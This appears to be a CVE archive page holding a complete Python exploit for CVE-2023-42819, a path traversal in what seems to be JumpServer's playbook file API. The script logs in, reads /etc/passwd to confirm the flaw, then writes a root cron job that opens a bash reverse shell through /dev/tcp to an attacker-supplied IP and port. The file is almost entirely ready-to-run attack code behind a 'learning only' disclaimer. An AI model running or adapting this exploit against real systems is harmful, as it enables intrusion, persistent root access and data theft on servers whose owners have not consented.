4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-42819.py PY
# -*- coding: utf-8 -*-
import argparse
import json
import logging
import os
import random
import string
import sys
import time
from urllib.parse import urljoin

import colorlog
import httpx
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
import undetected_chromedriver as uc

# 代理设置
PROXIES = {}


def banner():
    print('''

 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗ 
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝ 
                                                                                                        
                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: 代码仅供学习使用,请勿用于其他用途                              
    ''')


def setup_color_logging():
    # 创建一个 colorlog 的日志记录器
    logger_setting = colorlog.getLogger()
    logger_setting.setLevel(logging.INFO)

    # 创建控制台处理器并设置格式
    console_handler = logging.StreamHandler(sys.stdout)
    console_formatter = colorlog.ColoredFormatter(
        '%(asctime)s - %(log_color)s%(levelname)s - %(message)s',
        datefmt='%Y-%m-%d %H:%M:%S',
        reset=True,
        log_colors={
            'DEBUG': 'cyan',
            'INFO': 'green',
            'WARNING': 'yellow',
            'ERROR': 'red',
            'CRITICAL': 'bold_red',
        }
    )
    console_handler.setFormatter(console_formatter)

    # 将处理器添加到日志记录器
    logger_setting.addHandler(console_handler)

    return logger_setting


# 日志记录器对象
logger = setup_color_logging()


def create_driver():
    # 设置 chromedriver 的路径,使用新版的 Service
    # selenium version > 4.9
    service = Service(executable_path='chromedriver.exe')

    # 设置 ChromeOptions
    options = uc.ChromeOptions()
    options.add_argument('--disable-gpu')
    options.add_argument('--no-sandbox')
    options.add_argument('--headless')
    options.add_argument(
        '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36')
    options.add_argument('--ignore-certificate-errors')
    options.add_argument("--disable-logging")
    options.add_argument("--disable-dev-shm-usage")
    options.add_argument("--disable-plugins-discovery")
    options.add_argument('--no-first-run')
    options.add_argument('--no-service-autorun')
    options.add_argument('--no-default-browser-check')

    if PROXIES:
        options.add_argument(f"--proxy-server={PROXIES['all://']}")

    # 创建浏览器对象
    driver = uc.Chrome(service=service, options=options)
    # driver = webdriver.Chrome(service=service, options=options)

    return driver


def do_login(target: str, username: str, password: str):
    # 获取浏览器对象
    browser = create_driver()

    # 打开登录页面
    url = urljoin(target, '/core/auth/login/')
    browser.get(url=url)
    time.sleep(2)

    # 定位用户名和密码输入框
    username_input = browser.find_element(by=By.NAME, value='username')
    password_input = browser.find_element(by=By.ID, value='password')
    btn = browser.find_element(by=By.XPATH, value='//*[@id="login-form"]/div[5]/button')

    # 显示等待
    wait = WebDriverWait(browser, timeout=3)
    wait.until(lambda username_wait: username_input.is_displayed())
    wait.until(lambda password_wait: password_input.is_displayed())
    wait.until(lambda btn_wait: btn.is_displayed())
    # 清空输入框
    username_input.clear()
    password_input.clear()

    # 输入用户名和密码
    username_input.send_keys(username)
    password_input.send_keys(password)

    # 点击提交
    btn.click()

    # 获取当前页面的所有 cookie 信息 (返回字典)
    cookies = browser.get_cookies()
    logger.critical('Getting Cookies')
    # 将字典形式的 cookies 转换成 JSON 格式的字符串
    json_cookies = json.dumps(cookies)

    # 生成 cookie 文件名
    cookie_name = f'cookies.json'

    # 将 JSON 格式的 cookies 写入到本地文件
    with open(cookie_name, "w") as f:
        f.write(json_cookies)
        logger.critical('Cookies Write')

    # 等待保存 cookie
    time.sleep(3)
    # 关闭浏览器
    browser.close()


def generate_random_letters(length):
    letters = string.ascii_letters  # 获取所有大小写字母
    random_letters = ''.join(random.choices(letters, k=length))  # 从字母中随机选择指定长度的字符并拼接起来
    return random_letters


def client_config():
    # 读取 cookie.json
    with open('cookies.json', "r") as f:
        json_cookies = f.read()
    # 将 JSON 格式的 cookies 转换成字典形式
    cookies = json.loads(json_cookies)
    # 将 Cookie 列表转换为字典
    cookies_dict = {cookie['name']: cookie['value'] for cookie in cookies}

    # 设置 headers 的 X-CSRFToken 参数
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36',
    }
    # 获取 cookies 中的 jms_csrftoken
    CSRFToken = cookies_dict['jms_csrftoken']
    # 设置 headers 的 X-CSRFToken,必须带上 X-CSRFToken 参数
    headers.update({'X-CSRFToken': CSRFToken})

    client = httpx.Client(headers=headers, verify=False, follow_redirects=False, cookies=cookies_dict,
                          proxies=PROXIES)

    return client


def uid_verify(target: str, client):  # 如果存在 PlayBook 对象的情况下
    # Set API Url
    uid_url = urljoin(target, '/api/v1/ops/playbooks/')
    # Get uid
    try:
        uid_resp = client.get(url=uid_url)
        # 获取 uid
        if uid_resp.status_code == httpx.codes.OK and 'id' in uid_resp.text:
            uid_data = json.loads(uid_resp.text)
            ids = [entry['id'] for entry in uid_data]
            logger.critical('Playbook API INFO: %s', uid_resp.text)
            logger.critical('Playbook UID: %s', ids)
            return ids[0]
        else:
            logger.critical('Playbook UID is not exists')
    except (httpx.RequestError, httpx.HTTPStatusError) as error:
        logger.error('Request error or HTTP status error: %s', error)


def add_playbook(target: str, client):
    playbook_url = urljoin(target, '/api/v1/ops/playbooks/')
    # 随机命名
    playbook_name = generate_random_letters(4)
    json_data = {
        'name': playbook_name,
    }
    try:
        add_resp = client.post(url=playbook_url, json=json_data)
        if add_resp.status_code == 201 and 'id' in add_resp.text:
            logger.critical('Successfully Added: %s', add_resp.text)
        elif add_resp.status_code == 400:
            logger.error('Fields must be Unique: %s', add_resp.text)
        else:
            logger.error('Unknown Error: %s', add_resp.headers, add_resp.text)
    except (httpx.RequestError, httpx.HTTPStatusError) as error:
        logger.error('Request error or HTTP status error: %s', error)


def poc(target: str, uid: str, client):
    poc_url = urljoin(target, '/api/v1/ops/playbook/' + uid + '/file/?key=/etc/passwd')
    try:
        poc_resp = client.get(url=poc_url)
        if 'root' in poc_resp.text:
            logger.critical('Vulnerable : %s ', poc_resp.url)
            logger.critical('Output: %s', poc_resp.text)
            return True
        else:
            logger.critical('Not Vulnerable')
            return False
    except (httpx.RequestError, httpx.HTTPStatusError) as error:
        logger.error('Request error or HTTP status error: %s', error)


def exp(target: str, uid: str, client, shell_ip: str, shell_port: str):
    # 创建计划任务
    exp_url = urljoin(target, '/api/v1/ops/playbook/' + uid + '/file/')
    # JSON
    json_data = {
        "key": "/etc/cron.d",  # 创建路径
        "is_directory": True,  # 创建文件夹
        "name": "/etc/cron.d",  # 指定创建文件夹的名称
    }

    # 随机计划任务文件名
    shell_name = generate_random_letters(4)
    # JSON
    shell_data = {
        "key": "/etc/cron.d",  # 创建文件的路径
        "is_directory": False,  # 不创建文件夹
        "name": shell_name,  # 创建文件的名称
        "content": f"* * * * * root bash -c \"bash -i >& /dev/tcp/{shell_ip}/{shell_port} 0>&1\"\n"
        # 创建文件的内容
    }

    try:
        # 创建 cron.d 目录
        exp_resp = client.post(url=exp_url, json=json_data)
        if exp_resp.status_code == httpx.codes.OK:
            logger.critical('Directory is Successfully Created: %s', exp_resp.text)
            # 创建反弹 Shell 计划任务
            shell_resp = client.post(url=exp_url, json=shell_data)
            if shell_resp.status_code == httpx.codes.OK:
                logger.critical('Reverse Shell is Successfully Set: %s', shell_resp.text)
            else:
                logger.critical('Reverse Shell Failed: %s', exp_resp.text)
        else:
            logger.critical('Directory Creation Failed: %s', exp_resp.text)
    except (httpx.RequestError, httpx.HTTPStatusError) as error:
        logger.error('Request error or HTTP status error: %s', error)


def check_and_exploit(target: str, uid: str, client, shell_ip: str, shell_port: str):
    if poc(target, uid, client):
        exp(target, uid, client, shell_ip, shell_port)


def run(target: str, username: str, password: str, shell_ip: str, shell_port: str):
    # 判断 cookie 文件是否存在
    if not os.path.exists('cookies.json'):
        # 登录并获取 cookies 和 headers
        logger.warning('Cookie is not exists, DO LOGIN')
        do_login(target, username, password)

    # 获取 client
    client = client_config()
    # 如果存在 uid
    uid = uid_verify(target, client)
    if uid:
        check_and_exploit(target, uid, client, shell_ip, shell_port)
    else:
        # 如果不存在 uid,则执行添加动作
        add_playbook(target, client)
        uid = uid_verify(target, client)
        check_and_exploit(target, uid, client, shell_ip, shell_port)


if __name__ == '__main__':
    banner()

    parser = argparse.ArgumentParser(description='CVE-2023-42819 by C1ph3rX13.')
    parser.add_argument('-t', '--target', type=str, required=True, help='target url')
    parser.add_argument('-u', '--username', type=str, required=True, help='account username')
    parser.add_argument('-p', '--password', type=str, required=True, help='account password')
    parser.add_argument('--ip', type=str, required=True, help='shell ip')
    parser.add_argument('--port', type=str, required=True, help='shell port')
    parser.add_argument("--proxy", type=str, required=False, help="proxy to http://ip:port")

    args = parser.parse_args()
    if args.proxy:
        PROXIES = {'all://': f'{args.proxy}'}

    run(args.target, args.username, args.password, args.ip, args.port)